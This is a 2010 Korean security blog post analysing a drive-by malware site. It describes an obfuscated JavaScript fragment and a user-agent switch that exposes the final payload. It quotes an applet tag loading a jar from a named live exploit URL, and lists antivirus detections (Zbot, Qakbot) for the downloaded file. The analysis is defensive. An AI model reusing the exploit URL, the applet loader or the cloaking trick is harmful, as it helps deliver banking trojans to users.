본문 바로가기
security/악성코드 유포

www.rendom.mx/bst/ 익스플로릿 최종 파일!

Kwan's 2010. 5. 11. 22:29

우연히 구글링을 하던중 www.rendom.mx/bst/ 를 발견하였다.
이사이트는 익스플로릿을 배포하는것으로 알려져있다.
멀질라로 통해 처음에 봤을때는 코드형태가 매우 이상했다.

 var wR39n2OWQBsOq7 ='';

wR39n2OWQBsOq7 = 'so un ds25so un ds30so un ds41so un ds76so un ds61so u\
n ds72so un ds25so un ds32so un ds30so un ds59so un ds\

이런식으로 계속 반복이 되는 코드를 보았다.
난 바로 도움을 청했다. 이런것을 볼때는 어떻게 보아야하는지 물어보았다. 첨에는 멀질라로의 한계같았지만 약간의 설정만 변경하면 최종파일까지 보일수 있다는걸 알았다.

처음 멀질라 설정값은
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

이런식으로 되어있다 하지만 이렇게 본다면 나와같이 이게 뭐니 하고 의문을 가질것이다. 하지만 User Agent 를 통하여 설정을
Mozilla/7.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.2)  Gecko/20010726 Netscape/7.0

이쪽으로 설정을 변경한다면

 <applet code="sklif.Hieeyfc.class" archive="j1_893d.jar" width="480" height="200">
 <param name="data" VALUE="http://www.rendom.mx/bst/load.php?spl=javal">
 <param name="cc" value="1">
 </applet>

이런식으로 최종파일을 쉽게 찾을수 있다. 결론적으로 멀질라의 간단한 특성을 이해하고 있다면 쉽게 찾을수 있다는 것이었다.
이걸 찾기까지 많은 시간을 내주신 바이쭌님과 처리님께 마지막으로 감사를 드립니다!ㅎ

검사 파일: load.php 전송 시각: 2010.05.11 04:24:06 (UTC)

 a-squared 4.5.0.50
2010.05.10 Packed.Win32.Krap!IK

AhnLab-V3 2010.05.11.00
2010.05.10 Packed/Win32.Krap

AntiVir 8.2.1.236
2010.05.10 TR/Crypt.XPACK.Gen

 Antiy-AVL 2.0.3.7
2010.05.10 Packed/Win32.Krap.gen

Avast 4.8.1351.0
2010.05.10 Win32:Trojan-gen

Avast5 5.0.332.0
2010.05.10 Win32:Trojan-gen

AVG 9.0.0.787
2010.05.11 Generic17.BUNU

BitDefender   7.2
2010.05.11 Backdoor.Bot.121242

Comodo 4821
2010.05.11 TrojWare.Win32.Trojan.Agent.Gen

F-Secure 9.0.15370.0
2010.05.11 Backdoor.Bot.121242

GData 21
2010.05.11 Backdoor.Bot.121242

Ikarus T3.1.1.84.0
2010.05.11 Packed.Win32.Krap

Kaspersky 7.0.0.125
2010.05.11 Packed.Win32.Krap.gx

McAfee-GW-Edition
2010.1 2010.05.10 Artemis!7B7D3BC35365

Microsoft 1.5703
2010.05.11 PWS:Win32/Zbot.gen!Y

NOD32 5103
2010.05.10 a variant of Win32/Kryptik.EBW

nProtect 2010-05-10.01
2010.05.10 Backdoor.Bot.121242

Panda 10.0.2.7
2010.05.10 Suspicious file

Sophos 4.53.0
2010.05.11 Mal/Zbot-U

Sunbelt 6289
2010.05.11 Trojan.Win32.Generic!BT

TrendMicro 9.120.0.1004
2010.05.11 TSPY_QAKBOT.SMG

TrendMicro-HouseCall 9.120.0.1004
2010.05.11 TSPY_QAKBOT.SMG

 마지막으로 모든 샘플은 안철수연구소 , 이스트소프트

전송합니다!

'security > 악성코드 유포' 카테고리의 다른 글

지난주 악성코드 유포지 9곳 종합!  (0) 2010.05.17
프루나 무비서치 악성코드 유포중 !!  (0) 2010.05.13
CJ 엔터테인먼트 현재 악성코드 감염  (0) 2010.05.12
악의적인 목적이 포함된 주전자 닷컴!  (1) 2010.05.11
지난주 악성코드 유포사이트 7곳  (0) 2010.05.11

'security/악성코드 유포' Related Articles

티스토리툴바